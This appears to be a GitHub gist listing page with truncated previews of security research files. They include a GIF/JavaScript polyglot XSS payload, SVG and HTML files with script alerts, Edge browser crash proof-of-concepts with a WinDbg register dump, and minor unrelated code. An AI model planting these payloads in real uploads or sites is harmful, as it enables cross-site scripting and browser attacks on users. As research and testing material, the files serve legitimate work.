This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
GIF89a/*<svg/onload=alert(1)>*/=alert(document.domain)//; |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?xml version="1.0" standalone="no"?> | |
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"> | |
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"> | |
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/> | |
<script type="text/javascript"> | |
alert(document.domain); | |
</script> | |
</svg> |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<html> | |
<head> | |
<script> alert(document.domain);</script> | |
</head> | |
<body> | |
<b> test 123</b> | |
</body> | |
</html> |
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#Giant dictonary to hold key name and VK value | |
VK_CODE = {'backspace':0x08, | |
'tab':0x09, | |
'clear':0x0C, | |
'enter':0x0D, | |
'shift':0x10, | |
'ctrl':0x11, | |
'alt':0x12, | |
'pause':0x13, | |
'caps_lock':0x14, |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
interface AesGcmEncryptResult { | |
readonly attribute ArrayBuffer ciphertext; | |
readonly attribute ArrayBuffer tag; | |
}; | |
interface BookmarkCollection { | |
readonly attribute long length; | |
any item(unsigned long index); |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<!-- based on https://connect.microsoft.com/IE/feedback/details/1683347/ms-edge-combination-of-iframe-anchor-hash-navigation-and-history-state-crashes-the-browse --> | |
<!doctype html> | |
<html> | |
<head> | |
<script> | |
function boom() { | |
var iframe = document.getElementById('iframe1'); | |
iframe.src = "http://bing.com"; | |
iframe.src += ""; | |
document.location.href = '#'; |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
1:053> r | |
rax=0000000002000001 rbx=00007fff10b35f60 rcx=000000bdb9a099d0 | |
rdx=000000bdb8b100d0 rsi=0000000000000000 rdi=000000bdb9a099d0 | |
rip=00007fff10b80feb rsp=000000bdb9a097c0 rbp=000000bdb9a09860 | |
r8=0000000000000000 r9=0000000000000000 r10=0000000000000000 | |
r11=000000bdb9a09790 r12=000000bdb9a09940 r13=000000b5b6bb94c0 | |
r14=000000bdb8b100d0 r15=0000000000000000 | |
iopl=0 nv up ei pl nz na po nc | |
cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206 | |
EDGEHTML!SHIsSameObject+0x4b: |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<!-- based on https://connect.microsoft.com/IE/feedback/details/1683347/ms-edge-combination-of-iframe-anchor-hash-navigation-and-history-state-crashes-the-browse --> | |
<!doctype html> | |
<html> | |
<head> | |
<script> | |
function boom() { | |
var iframe = document.getElementById('iframe1'); | |
document.location.href = '#'; | |
iframe.parentNode.removeChild(iframe); | |
alert(history.state); |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<!doctype html> | |
<html ng-app="app"> | |
<head> | |
<script src="https://code.angularjs.org/1.4.0/angular.js"></script> | |
<script> | |
angular.module('app', []).run(function($http) { | |
$http.post("/boom", | |
{ | |
"a1": { |
NewerOlder